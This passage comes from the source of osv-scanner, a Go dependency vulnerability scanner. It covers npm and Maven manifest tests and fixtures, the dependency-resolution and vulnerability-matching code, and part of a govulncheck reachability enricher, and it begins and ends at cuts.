TestNpmWorkspaceRead(t *testing.T) { t.Parallel() df, err := depfile.OpenLocalDepFile("./testdata/npm-workspaces/package.json") if err != nil { t.Fatalf("failed to open file: %v", err) } defer df.Close() npmRW := manifest.NpmReadWriter{} got, err := npmRW.Read(df) if err != nil { t.Fatalf("failed to read file: %v", err) } if !strings.HasSuffix(got.FilePath, "package.json") { t.Errorf("manifest file path %v does not have package.json", got.FilePath) } got.FilePath = "" for i, local := range got.LocalManifests { if !strings.HasSuffix(local.FilePath, "package.json") { t.Errorf("local manifest file path %v does not have package.json", local.FilePath) } got.LocalManifests[i].FilePath = "" } want := manifest.Manifest{ Root: resolve.Version{ VersionKey: npmVK(t, "npm-workspace-test", "1.0.0", resolve.Concrete), }, Requirements: []resolve.RequirementVersion{ // root dependencies always before workspace { Type: aliasType(t, "jquery-real"), VersionKey: npmVK(t, "jquery", "^3.7.1", resolve.Requirement), }, // workspaces in path order { VersionKey: npmVK(t, "jquery:workspace", "^3.7.1", resolve.Requirement), }, { VersionKey: npmVK(t, "@workspace/ugh:workspace", "*", resolve.Requirement), }, { VersionKey: npmVK(t, "z-z-z:workspace", "*", resolve.Requirement), }, }, Groups: map[manifest.RequirementKey][]string{ npmReqKey(t, "jquery", "jquery-real"): {"dev"}, // excludes workspace dev dependency }, LocalManifests: []manifest.Manifest{ { Root: resolve.Version{ VersionKey: npmVK(t, "jquery:workspace", "3.7.1", resolve.Concrete), }, Requirements: []resolve.RequirementVersion{ { VersionKey: npmVK(t, "semver", "^7.6.0", resolve.Requirement), }, }, Groups: map[manifest.RequirementKey][]string{}, }, { Root: resolve.Version{ VersionKey: npmVK(t, "@workspace/ugh:workspace", "0.0.1", resolve.Concrete), }, Requirements: []resolve.RequirementVersion{ { VersionKey: npmVK(t, "jquery:workspace", "*", resolve.Requirement), }, { VersionKey: npmVK(t, "semver", "^6.3.1", resolve.Requirement), }, }, Groups: map[manifest.RequirementKey][]string{ npmReqKey(t, "jquery:workspace", ""): {"dev"}, npmReqKey(t, "semver", ""): {"dev"}, }, }, { Root: resolve.Version{ VersionKey: npmVK(t, "z-z-z:workspace", "1.0.0", resolve.Concrete), }, Requirements: []resolve.RequirementVersion{ { VersionKey: npmVK(t, "@workspace/ugh:workspace", "*", resolve.Requirement), }, { VersionKey: npmVK(t, "semver", "^5.7.2", resolve.Requirement), }, }, Groups: map[manifest.RequirementKey][]string{}, }, }, } if !reflect.DeepEqual(got, want) { t.Errorf("npm manifest mismatch:\ngot %v\nwant %v\n", got, want) } } func TestNpmWrite(t *testing.T) { t.Parallel() df, err := depfile.OpenLocalDepFile("./testdata/package.json") if err != nil { t.Fatalf("failed to open file: %v", err) } defer df.Close() changes := manifest.Patch{ Deps: []manifest.DependencyPatch{ { Pkg: resolve.PackageKey{ System: resolve.NPM, Name: "lodash", }, OrigRequire: "4.17.17", NewRequire: "^4.17.21", }, { Pkg: resolve.PackageKey{ System: resolve.NPM, Name: "eslint", }, OrigRequire: "^8.57.0", NewRequire: "*", }, { Pkg: resolve.PackageKey{ System: resolve.NPM, Name: "glob", }, OrigRequire: "^10.3.10", NewRequire: "^1.0.0", }, { Pkg: resolve.PackageKey{ System: resolve.NPM, Name: "jquery", }, OrigRequire: "latest", NewRequire: "~0.0.1", }, { Pkg: resolve.PackageKey{ System: resolve.NPM, Name: "@isaacs/cliui", }, Type: aliasType(t, "cliui"), OrigRequire: "^8.0.2", NewRequire: "^9.0.0", }, { Pkg: resolve.PackageKey{ System: resolve.NPM, Name: "string-width", }, OrigRequire: "^5.1.2", NewRequire: "^7.1.0", }, { Pkg: resolve.PackageKey{ System: resolve.NPM, Name: "string-width", }, Type: aliasType(t, "string-width-aliased"), OrigRequire: "^4.2.3", NewRequire: "^6.1.0", }, }, } buf := new(bytes.Buffer) npmRW := manifest.NpmReadWriter{} if err := npmRW.Write(df, buf, changes); err != nil { t.Fatalf("unable to update npm package.json: %v", err) } testutility.NewSnapshot().WithCRLFReplacement().MatchText(t, buf.String()) } ================================================ FILE: internal/resolution/manifest/testdata/maven/my-app/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: internal/resolution/manifest/testdata/maven/my-app/pom.xml ================================================ 4.0.0 com.mycompany.app my-app 1.0 my-app http://www.example.com Don't escape. Escape "this". Ol' Cap'n Napkins Ol" Cap"n Napkins org.parent parent-pom 1.1.1 ../parent/pom.xml UTF-8 1.7 1.7 4.12 ../bin junit junit ${junit.version} test org.example abc 1.0.1 org.example no-version org.example exclusions 1.0.0 org.exclude exclude org.example xyz 2.0.0 org.example no-version 2.0.0 org.import import 1.0.0 pom import profile-one true 2.3.4 org.profile abc 1.2.3 org.profile def ${def.version} profile-two org.import xyz 6.6.6 import pom org.plugin plugin 1.0.0 org.dep plugin-dep 2.3.3 ================================================ FILE: internal/resolution/manifest/testdata/maven/no-dependency-management.xml ================================================ 4.0.0 com.mycompany.app my-app 1.0 my-app http://www.example.com org.parent parent-pom 1.1.1 junit junit 4.12 ================================================ FILE: internal/resolution/manifest/testdata/maven/parent/grandparent/mismatch.xml ================================================ 4.0.0 org.upstream wrong-parent 1.1.1 pom ================================================ FILE: internal/resolution/manifest/testdata/maven/parent/grandparent/pom.xml ================================================ 4.0.0 org.grandparent grandparent-pom 1.1.1 my-app http://www.example.com pom org.upstream parent-pom 1.2.3 ./mismatch.xml ================================================ FILE: internal/resolution/manifest/testdata/maven/parent/pom.xml ================================================ 4.0.0 org.parent parent-pom 1.1.1 my-app http://www.example.com pom org.grandparent grandparent-pom 1.1.1 ./grandparent 1.1.1 org.example ddd 1.2.3 org.example aaa ${aaa.version} ================================================ FILE: internal/resolution/manifest/testdata/npm-workspaces/package.json ================================================ { "name": "npm-workspace-test", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "author": "", "license": "ISC", "workspaces": [ "z", "ws/*" ], "devDependencies": { "jquery": "^3.7.1", "jquery-real": "npm:jquery@^3.7.1" }, "dependencies": { "@workspace/ugh": "*" } } ================================================ FILE: internal/resolution/manifest/testdata/npm-workspaces/ws/jquery/package.json ================================================ { "name": "jquery", "version": "3.7.1", "description": "", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "author": "", "license": "ISC", "dependencies": { "semver": "^7.6.0" } } ================================================ FILE: internal/resolution/manifest/testdata/npm-workspaces/ws/ugh/package.json ================================================ { "name": "@workspace/ugh", "version": "0.0.1", "description": "", "main": "index.js", "devDependencies": { "jquery": "*", "semver": "^6.3.1" }, "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "author": "", "license": "ISC" } ================================================ FILE: internal/resolution/manifest/testdata/npm-workspaces/z/package.json ================================================ { "name": "z-z-z", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "author": "", "license": "ISC", "dependencies": { "@workspace/ugh": "*", "semver": "^5.7.2" } } ================================================ FILE: internal/resolution/manifest/testdata/package.json ================================================ { "name": "npm-manifest", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "author": "", "license": "ISC", "dependencies": { "cliui": "npm:@isaacs/cliui@^8.0.2", "jquery": "latest", "lodash": "4.17.17", "string-width": "^5.1.2", "string-width-aliased": "npm:string-width@^4.2.3" }, "devDependencies": { "eslint": "^8.57.0" }, "optionalDependencies": { "glob": "^10.3.10" }, "peerDependencies": { "@babel/core": "^7.24.0" } } ================================================ FILE: internal/resolution/manifest/testmain_test.go ================================================ package manifest_test import ( "testing" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestMain(m *testing.M) { m.Run() testutility.CleanSnapshots(m) } ================================================ FILE: internal/resolution/resolve.go ================================================ // Package resolution provides functionality for resolving dependencies and vulnerabilities. package resolution import ( "cmp" "context" "errors" "fmt" "slices" "deps.dev/util/resolve" "deps.dev/util/resolve/dep" "deps.dev/util/resolve/maven" "deps.dev/util/resolve/npm" "github.com/google/osv-scanner/v2/internal/resolution/client" "github.com/google/osv-scanner/v2/internal/resolution/manifest" mavenutil "github.com/google/osv-scanner/v2/internal/utility/maven" "github.com/ossf/osv-schema/bindings/go/osvschema" ) type Vulnerability struct { OSV *osvschema.Vulnerability DevOnly bool // Subgraphs are the collections of nodes and edges that reach the vulnerable node. // Subgraphs all contain the root node (NodeID 0) with no incoming edges (Parents), // and the vulnerable node (NodeID DependencySubgraph.Dependency) with no outgoing edges (Children). Subgraphs []*DependencySubgraph } func (rv Vulnerability) IsDirect() bool { for _, sg := range rv.Subgraphs { if sg.Nodes[0].Distance == 1 { return true } } return false } type Result struct { Manifest manifest.Manifest Graph *resolve.Graph Vulns []Vulnerability UnfilteredVulns []Vulnerability } type NodeError struct { NodeID resolve.NodeID Error resolve.NodeError } func (res *Result) Errors() []NodeError { var errs []NodeError for i, n := range res.Graph.Nodes { for _, err := range n.Errors { errs = append(errs, NodeError{ NodeID: resolve.NodeID(i), Error: err, }) } } return errs } func getResolver(sys resolve.System, cl resolve.Client) (resolve.Resolver, error) { switch sys { case resolve.NPM: return npm.NewResolver(cl), nil case resolve.Maven: return maven.NewResolver(cl), nil default: return nil, fmt.Errorf("no resolver for ecosystem %v", sys) } } type ResolveOpts struct { MavenManagement bool // whether to include unresolved dependencyManagement dependencies in resolved graph. } func Resolve(ctx context.Context, cl client.ResolutionClient, m manifest.Manifest, opts ResolveOpts) (*Result, error) { c := client.NewOverrideClient(cl.DependencyClient) c.AddVersion(m.Root, m.Requirements) for _, loc := range m.LocalManifests { c.AddVersion(loc.Root, loc.Requirements) // TODO: may need to do this recursively } cl.DependencyClient = c r, err := getResolver(m.System(), cl.DependencyClient) if err != nil { return nil, err } graph, err := r.Resolve(ctx, m.Root.VersionKey) if err != nil { return nil, err } graph, err = resolvePostProcess(ctx, cl, m, opts, graph) if err != nil { return nil, err } if len(graph.Error) > 0 { return nil, errors.New(graph.Error) } result := &Result{ Manifest: m.Clone(), Graph: graph, } if err := result.computeVulns(ctx, cl); err != nil { return nil, err } // Make a copy of the found vulns, as `Vulns` may be filtered according to specified criteria. result.UnfilteredVulns = slices.Clone(result.Vulns) return result, nil } func resolvePostProcess(ctx context.Context, cl client.ResolutionClient, m manifest.Manifest, opts ResolveOpts, graph *resolve.Graph) (*resolve.Graph, error) { if m.System() == resolve.Maven && opts.MavenManagement { // Add a node & edge for each dependency in dependencyManagement that doesn't already appear in the resolved graph manifestSpecific, ok := m.EcosystemSpecific.(manifest.MavenManifestSpecific) if !ok { return graph, errors.New("invalid MavenManifestSpecific data") } // Search through OriginalRequirements management dependencies in this pom only (not parents). // TODO: Possibly refactor RequirementsForUpdates for this purpose. for _, req := range manifestSpecific.OriginalRequirements { if req.Origin != mavenutil.OriginManagement { // TODO: also check management in activated profiles and dependencies in inactive profiles. continue } // Unique identifier for this package. reqKey := manifest.MakeRequirementKey(resolve.RequirementVersion{ VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: req.Name(), }, VersionType: resolve.Requirement, Version: string(req.Version), }, Type: resolve.MavenDepType(req.Dependency, req.Origin), }) // Find the current version of the dependencyManagement dependency, after property interpolation & changes from remediation. idx := slices.IndexFunc(m.Requirements, func(rv resolve.RequirementVersion) bool { if origin, _ := rv.Type.GetAttr(dep.MavenDependencyOrigin); origin != mavenutil.OriginManagement { return false } return reqKey == manifest.MakeRequirementKey(rv) }) if idx == -1 { // Ideally, this would be an error, but there a few known instances where this lookup fails: // 1. The artifact name contain a property (properties aren't substituted in OriginalRequirements, but are in Manifest.Requirements) // 2. Missing properties (due to e.g. un-activated profiles) cause the dependency to be invalid, and therefore excluded from Manifest.Requirements. // Ignore these dependencies in these cases so that we can still remediation vulns in the other packages. // TODO: logging continue } rv := m.Requirements[idx] // See if the package is already in the resolved graph. // Check the edges so we can make sure the ArtifactTypes and Classifiers match. if !slices.ContainsFunc(graph.Edges, func(e resolve.Edge) bool { return reqKey == manifest.MakeRequirementKey(resolve.RequirementVersion{ VersionKey: graph.Nodes[e.To].Version, Type: e.Type, }) }) { // Management dependency not in graph - create the node. // Find the version the management requirement would resolve to. // First assume it's a soft requirement. vk := rv.VersionKey vk.VersionType = resolve.Concrete if _, err := cl.Version(ctx, vk); err != nil { // Not a soft requirement - try to find a match. vk.VersionType = resolve.Requirement vks, err := cl.MatchingVersions(ctx, vk) if err != nil || len(vks) == 0 { err = graph.AddError(0, vk, fmt.Sprintf("could not find a version that satisfies requirement %s for package %s", vk.Version, vk.Name)) if err != nil { return nil, err } continue } vk = vks[len(vks)-1].VersionKey } // Add the node & and edge from the root. nID := graph.AddNode(vk) if err := graph.AddEdge(0, nID, rv.Version, rv.Type.Clone()); err != nil { return nil, err } } } } return graph, nil } // computeVulns scans for vulnerabilities in a resolved graph and populates res.Vulns func (res *Result) computeVulns(ctx context.Context, cl client.ResolutionClient) error { nodeVulns, err := cl.MatchVulnerabilities(ctx, client.GraphToInventory(res.Graph)) if err != nil { return err } // GraphToInventory/MatchVulnerabilities excludes the root node of the graph. // Prepend an element to nodeVulns so that the indices line up with graph.Nodes[i] <=> nodeVulns[i] nodeVulns = append([][]*osvschema.Vulnerability{nil}, nodeVulns...) // Find all dependency paths to the vulnerable dependencies var vulnerableNodes []resolve.NodeID vulnInfo := make(map[string]*osvschema.Vulnerability) for i, vulns := range nodeVulns { if len(vulns) > 0 { vulnerableNodes = append(vulnerableNodes, resolve.NodeID(i)) } for _, vuln := range vulns { vulnInfo[vuln.GetId()] = vuln } } nodeSubgraphs := ComputeSubgraphs(res.Graph, vulnerableNodes) vulnSubgraphs := make(map[string][]*DependencySubgraph) for i, nID := range vulnerableNodes { for _, vuln := range nodeVulns[nID] { vulnSubgraphs[vuln.GetId()] = append(vulnSubgraphs[vuln.GetId()], nodeSubgraphs[i]) } } // construct the resolution.Vulnerability // TODO: This constructs a single resolution.Vulnerability per vulnerability ID. // The scan action treats vulns with the same ID but affecting different versions of a package as distinct. // TODO: Combine aliased IDs for id, vuln := range vulnInfo { rv := Vulnerability{OSV: vuln, DevOnly: true} rv.Subgraphs = vulnSubgraphs[id] rv.DevOnly = !slices.ContainsFunc(rv.Subgraphs, func(ds *DependencySubgraph) bool { return !ds.IsDevOnly(res.Manifest.Groups) }) res.Vulns = append(res.Vulns, rv) } return nil } // FilterVulns populates Vulns with the UnfilteredVulns that satisfy matchFn func (res *Result) FilterVulns(matchFn func(Vulnerability) bool) { var matchedVulns []Vulnerability for _, v := range res.UnfilteredVulns { if matchFn(v) { matchedVulns = append(matchedVulns, v) } } res.Vulns = matchedVulns } type Difference struct { manifest.Patch Original *Result New *Result RemovedVulns []Vulnerability AddedVulns []Vulnerability } func (res *Result) CalculateDiff(other *Result) Difference { diff := Difference{ Original: res, New: other, Patch: manifest.Patch{Manifest: &res.Manifest}, } // Find the changed requirements and the versions they resolve to for i, oldReq := range res.Manifest.Requirements { // assuming these are in the same order and none are added/removed newReq := other.Manifest.Requirements[i] if oldReq.Version == newReq.Version { continue } // Find the node in the graph to find which actual version it resolved to var oldResolved string for _, e := range res.Graph.Edges { toNode := res.Graph.Nodes[e.To] if e.From == 0 && toNode.Version.PackageKey == oldReq.PackageKey { oldResolved = toNode.Version.Version break } } var newResolved string for _, e := range other.Graph.Edges { toNode := other.Graph.Nodes[e.To] if e.From == 0 && toNode.Version.PackageKey == newReq.PackageKey { newResolved = toNode.Version.Version break } } diff.Deps = append(diff.Deps, manifest.DependencyPatch{ Pkg: oldReq.PackageKey, Type: oldReq.Type.Clone(), OrigRequire: oldReq.Version, OrigResolved: oldResolved, NewRequire: newReq.Version, NewResolved: newResolved, }) } // Compute differences in present vulnerabilities. // Currently this relies on vulnerability IDs being unique in the Vulns slice. oldVulns := make(map[string]int, len(res.Vulns)) for i, v := range res.Vulns { oldVulns[v.OSV.GetId()] = i } for _, v := range other.Vulns { if _, ok := oldVulns[v.OSV.GetId()]; ok { // The vuln already existed. delete(oldVulns, v.OSV.GetId()) // delete so we know what's been removed } else { // This vuln was not in the original resolution - it was newly added diff.AddedVulns = append(diff.AddedVulns, v) } } // Any remaining oldVulns have been removed in the new resolution for _, idx := range oldVulns { diff.RemovedVulns = append(diff.RemovedVulns, res.Vulns[idx]) } return diff } // Compare compares ResolutionDiffs based on 'effectiveness' (best first): // // Sort order: // 1. (number of fixed vulns - introduced vulns) / (number of changed direct dependencies) [descending] // (i.e. more efficient first) // 2. number of fixed vulns [descending] // 3. number of changed direct dependencies [ascending] // 4. changed direct dependency name package names [ascending] // 5. size of changed direct dependency bump [ascending] func (a Difference) Compare(b Difference) int { // 1. (fixed - introduced) / (changes) [desc] // Multiply out to avoid float casts aRatio := (len(a.RemovedVulns) - len(a.AddedVulns)) * (len(b.Deps)) bRatio := (len(b.RemovedVulns) - len(b.AddedVulns)) * (len(a.Deps)) if c := cmp.Compare(aRatio, bRatio); c != 0 { return -c } // 2. number of fixed vulns [desc] if c := cmp.Compare(len(a.RemovedVulns), len(b.RemovedVulns)); c != 0 { return -c } // 3. number of changed deps [asc] if c := cmp.Compare(len(a.Deps), len(b.Deps)); c != 0 { return c } // 4. changed names [asc] for i, aDep := range a.Deps { bDep := b.Deps[i] if c := aDep.Pkg.Compare(bDep.Pkg); c != 0 { return c } } // 5. dependency bump amount [asc] for i, aDep := range a.Deps { bDep := b.Deps[i] sv := aDep.Pkg.Semver() if c := sv.Compare(aDep.NewResolved, bDep.NewResolved); c != 0 { return c } } return 0 } ================================================ FILE: internal/resolution/resolve_test.go ================================================ package resolution_test import ( "cmp" "slices" "testing" "deps.dev/util/resolve" "deps.dev/util/resolve/dep" "github.com/google/osv-scanner/v2/internal/resolution" "github.com/google/osv-scanner/v2/internal/resolution/clienttest" "github.com/google/osv-scanner/v2/internal/resolution/manifest" "github.com/google/osv-scanner/v2/internal/testutility" ) func checkResult(t *testing.T, result *resolution.Result) { t.Helper() snap := testutility.NewSnapshot() snap.MatchText(t, result.Graph.String()) type minimalVuln struct { ID string DevOnly bool Subgraphs []*resolution.DependencySubgraph } minVulns := make([]minimalVuln, len(result.Vulns)) for i, v := range result.Vulns { minVulns[i] = minimalVuln{ ID: v.OSV.GetId(), DevOnly: v.DevOnly, Subgraphs: v.Subgraphs, } } slices.SortFunc(minVulns, func(a, b minimalVuln) int { return cmp.Compare(a.ID, b.ID) }) snap.MatchJSON(t, minVulns) } func TestResolve(t *testing.T) { t.Parallel() aliasType := func(knownAs string) dep.Type { t.Helper() typ := dep.NewType() typ.AddAttr(dep.KnownAs, knownAs) return typ } type requirement struct { name string version string typ dep.Type groups []string } tests := []struct { name string version string system resolve.System universe string vulns string requirements []requirement opts resolution.ResolveOpts }{ { name: "simple", // simple root -> dependency -> vuln version: "1.0.0", system: resolve.NPM, universe: "./testdata/basic-universe.yaml", vulns: "./testdata/basic-vulns.json", requirements: []requirement{ { name: "dependency", version: "^1.0.0", groups: []string{"dev"}, }, }, }, { name: "direct", // vulnerability in direct dependency version: "1.0.0", system: resolve.NPM, universe: "./testdata/basic-universe.yaml", vulns: "./testdata/basic-vulns.json", requirements: []requirement{ { name: "bad", version: "^2.0.0", }, }, }, { name: "duplicates", // same package with vulns included multiple times version: "1.1.1", system: resolve.NPM, universe: "./testdata/basic-universe.yaml", vulns: "./testdata/basic-vulns.json", requirements: []requirement{ { name: "bad", version: "^1.0.0", typ: aliasType("bad-aliased"), }, { name: "dependency", version: "^2.0.0", groups: []string{"dev"}, }, { name: "dependency", version: "^1.0.0", typ: aliasType("dependency-v1"), }, }, }, { name: "different-pkgs", // same vuln in two different packages version: "3.0.0", system: resolve.NPM, universe: "./testdata/basic-universe.yaml", vulns: "./testdata/basic-vulns.json", requirements: []requirement{ { name: "bad2", version: "^1.0.0", }, { name: "dependency", version: "^1.0.0", }, }, }, { name: "existing", // manifest package/version exists in universe already version: "1.0.0", system: resolve.NPM, universe: "./testdata/basic-universe.yaml", vulns: "./testdata/basic-vulns.json", requirements: []requirement{ { name: "dependency", version: "^2.0.0", typ: dep.NewType(dep.Opt), }, }, }, { name: "non-problem", // non-problem chains version: "1.0.0", system: resolve.NPM, universe: "./testdata/basic-universe.yaml", vulns: "./testdata/basic-vulns.json", requirements: []requirement{ { name: "bad", version: "^1.0.0", }, { name: "dependency", version: "^3.0.0", }, }, }, { name: "diamond", // diamond dependency on vulnerable pkg version: "1.0.0", system: resolve.NPM, universe: "./testdata/diamond-universe.yaml", vulns: "./testdata/diamond-vulns.json", requirements: []requirement{ { name: "pkg", version: "^1.0.0", }, { name: "dep-one", version: "^1.0.0", groups: []string{"dev"}, }, }, }, { name: "complex", // more complex graph/vulnerability structure version: "9.9.9", system: resolve.NPM, universe: "./testdata/complex-universe.yaml", vulns: "./testdata/complex-vulns.json", requirements: []requirement{ { name: "alice", version: "^1.0.0", typ: aliasType("chuck"), }, { name: "bob", version: "2.2.2", }, { name: "dave", version: "~3.3.3", groups: []string{"dev"}, }, }, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() cl := clienttest.NewMockResolutionClient(t, tt.universe, tt.vulns) var m manifest.Manifest m.Root = resolve.Version{ VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ Name: tt.name, System: tt.system, }, Version: tt.version, VersionType: resolve.Concrete, }, } m.Groups = make(map[manifest.RequirementKey][]string) m.Requirements = make([]resolve.RequirementVersion, len(tt.requirements)) for i, req := range tt.requirements { m.Requirements[i] = resolve.RequirementVersion{ VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ Name: req.name, System: tt.system, }, Version: req.version, VersionType: resolve.Requirement, }, Type: req.typ, } m.Groups[manifest.MakeRequirementKey(m.Requirements[i])] = req.groups } res, err := resolution.Resolve(t.Context(), cl, m, tt.opts) if err != nil { t.Fatalf("error resolving: %v", err) } checkResult(t, res) }) } } ================================================ FILE: internal/resolution/testdata/basic-universe.yaml ================================================ system: npm schema: | dependency 0.0.1 1.0.0 bad@^1.0.0 2.0.0 bad@^2.0.0 3.0.0 bad@* bad 1.0.0 1.1.1 2.0.0 2.2.2 bad2 1.0.0 existing 1.0.0 bad@^1.0.0 bad2@^1.0.0 dependency@^0.0.1 ================================================ FILE: internal/resolution/testdata/basic-vulns.json ================================================ { "vulns": [ { "affected": [ { "package": { "ecosystem": "npm", "name": "bad" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "2.0.0" } ], "type": "SEMVER" } ] } ], "id": "OSV-000-000" }, { "affected": [ { "package": { "ecosystem": "npm", "name": "bad" }, "ranges": [ { "events": [ { "introduced": "0" } ], "type": "SEMVER" } ] }, { "package": { "ecosystem": "npm", "name": "bad2" }, "ranges": [ { "events": [ { "introduced": "0" } ], "type": "SEMVER" } ] } ], "id": "OSV-000-001" }, { "affected": [ { "package": { "ecosystem": "npm", "name": "dependency" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.0.0" } ], "type": "SEMVER" } ] } ], "id": "OSV-000-002" }, { "affected": [ { "package": { "ecosystem": "npm", "name": "existing" }, "ranges": [ { "events": [ { "introduced": "0" } ], "type": "SEMVER" } ] } ], "id": "OSV-000-003" } ] } ================================================ FILE: internal/resolution/testdata/complex-universe.yaml ================================================ system: npm schema: | alice 1.0.0 1.0.1 bob@^2.0.0 bob 2.0.0 2.0.1 2.2.2 chuck 2.0.0 bob@^2.0.1 dave 3.3.3 bob@^2.2.2 KnownAs duck|chuck@^2.0.0 ================================================ FILE: internal/resolution/testdata/complex-vulns.json ================================================ { "vulns": [ { "affected": [ { "package": { "ecosystem": "npm", "name": "alice" }, "ranges": [ { "events": [ { "introduced": "1.0.1" }, { "fixed": "2.0.0" } ], "type": "SEMVER" } ] } ], "id": "CMPLX-0000-0000" }, { "affected": [ { "package": { "ecosystem": "npm", "name": "bob" }, "ranges": [ { "events": [ { "introduced": "0" } ], "type": "SEMVER" } ] } ], "id": "CMPLX-1000-0000" }, { "affected": [ { "package": { "ecosystem": "npm", "name": "chuck" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.0.1" }, { "introduced": "2.0.0" }, { "fixed": "3.0.0" } ], "type": "SEMVER" } ] } ], "id": "CMPLX-2000-0000" }, { "affected": [ { "package": { "ecosystem": "npm", "name": "dave" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "3.3.2" }, { "introduced": "3.3.4" } ], "type": "SEMVER" } ] } ], "id": "CMPLX-3000-0000" } ] } ================================================ FILE: internal/resolution/testdata/diamond-universe.yaml ================================================ system: npm schema: | pkg 1.0.0 bad@^1.0.0 dep-one 1.0.0 bad@^1.0.0 dep-two@^1.0.0 dep-two 1.0.0 bad@^1.0.0 bad 1.0.0 1.1.1 ================================================ FILE: internal/resolution/testdata/diamond-vulns.json ================================================ { "vulns": [ { "affected": [ { "package": { "ecosystem": "npm", "name": "bad" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "2.0.0" } ], "type": "SEMVER" } ] } ], "id": "DIA-000-000" } ] } ================================================ FILE: internal/resolution/testmain_test.go ================================================ package resolution_test import ( "testing" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestMain(m *testing.M) { m.Run() testutility.CleanSnapshots(m) } ================================================ FILE: internal/resolution/util/depsdev.go ================================================ // Package util provides utility functions for dependency resolution. package util import ( "deps.dev/util/resolve" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scalibr/purl" "github.com/ossf/osv-schema/bindings/go/osvconstants" ) // OSVEcosystem maps resolve.System constants to osvschema.Ecosystem constants // // TODO: use osvschema.Ecosystem or imodel's osvecosystem.Parsed var OSVEcosystem = map[resolve.System]osvconstants.Ecosystem{ resolve.NPM: osvconstants.EcosystemNPM, resolve.Maven: osvconstants.EcosystemMaven, } var PURLType = map[resolve.System]string{ resolve.NPM: purl.TypeNPM, resolve.Maven: purl.TypeMaven, } func VKToPackageInfo(vk resolve.VersionKey) *extractor.Package { return &extractor.Package{ Name: vk.Name, Version: vk.Version, PURLType: PURLType[vk.System], } } ================================================ FILE: internal/scalibrenricher/govulncheck/source/govulncheck.go ================================================ // Copyright 2025 Google LLC // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. // Package source provides an enricher that uses govulncheck to scan Go source code. package source import ( "bytes" "context" "encoding/json" "io" "os" "os/exec" "path/filepath" "slices" "github.com/google/osv-scalibr/enricher" "github.com/google/osv-scalibr/extractor/filesystem/language/golang/gomod" "github.com/google/osv-scalibr/inventory" "github.com/google/osv-scalibr/inventory/vex" "github.com/google/osv-scalibr/log" "github.com/google/osv-scalibr/plugin" "golang.org/x/vuln/scan" ) const ( // Name is the unique name of this enricher. Name = "enricher/reachability/govulncheck/source" ) // Enricher is an enricher that runs govulncheck on Go source code. type Enricher struct{} // Name returns the name of the enricher. func (e *Enricher) Name() string { return Name } // Version returns the version of the enricher. func (e *Enricher) Version() int { return 0 } // Requirements returns the requirements of the enricher. func (e *Enricher) Requirements() *plugin.Capabilities { return &plugin.Capabilities{ Network: plugin.NetworkOnline, DirectFS: true, } } // RequiredPlugins returns the names of the plugins required by this enricher. func (e *Enricher) RequiredPlugins() []string { return []string{gomod.Name} } func NewEnricher() Enricher { return Enricher{} } // Enrich runs govulncheck on the Go modules in the inventory. func (e *Enricher) Enrich(ctx context.Context, input *enricher.ScanInput, inv *inventory.Inventory) error { cmd := exec.CommandContext(ctx, "go", "version") _, err := cmd.Output() if err != nil { log.Infof("Skipping call analysis on Go code since Go is not installed.") return nil //nolint:nilerr } goModVersions := make(map[string]string) for _, pkg := range inv.Packages { if !slices.Contains(pkg.Plugins, gomod.Name) { continue } if pkg.Name == "stdlib" { loc := pkg.Location.PathOrEmpty() if loc == "" || goModVersions[loc] != "" { continue } // Set GOVERSION to the Go version in go.mod. goModVersions[loc] = pkg.Version } } for goModLocation, goVersion := range goModVersions { modDir := filepath.Dir(goModLocation) absModDir := filepath.Join(input.ScanRoot.Path, modDir) findings, err := e.runGovulncheck(ctx, absModDir, goVersion) if err != nil { log.Errorf("govulncheck on %s: %v", modDir, err) continue } if len(findings) == 0 { continue } e.addSignals(inv, findings) } return nil } func (e *Enricher) addSignals(inv *inventory.Inventory, idToFindings map[string][]*Finding) { for _, pv := range inv.PackageVulns { findings, exist := idToFindings[pv.Vulnerability.GetId()] // Skip if no findings for this package vulnerability ID if !exist { continue } isReachable := false for _, f := range findings { if len(f.Trace) > 0 && f.Trace[0].Function != "" { isReachable = true break } } if !isReachable { pv.ExploitabilitySignals = append(pv.ExploitabilitySignals, &vex.FindingExploitabilitySignal{ Plugin: Name, Justification: vex.VulnerableCodeNotInExecutePath, }) } } } func (e *Enricher) runGovulncheck(ctx context.Context, absModDir string, goVersion string) (map[string][]*Finding, error) { cmd := scan.Command(ctx, "-C", absModDir, "-json", "./...") var b bytes.Buffer cmd.Stdout = &b cmd.Env = append(os.Environ(), "GOVERSION=go"+goVersion) if err := cmd.Start(); err != nil { return nil, err } if err := cmd.Wait(); err != nil { return nil, err } // Group the output of govulncheck based on the OSV ID. h := &osvHandler{ idToFindings: map[string][]*Finding{}, } if err := handleJSON(bytes.NewReader(b.Bytes()), h); err != nil { return nil, err } return h.idToFindings, nil } type osvHandler struct { idToFindings map[string][]*Finding } func (h *osvHandler) Finding(f *Finding) { h.idToFindings[f.OSV] = append(h.idToFindings[f.OSV], f) } func handleJSON(from io.Reader, to *osvHandler) error { dec := json.NewDecoder(from) for dec.More() { msg := Message{} if err := 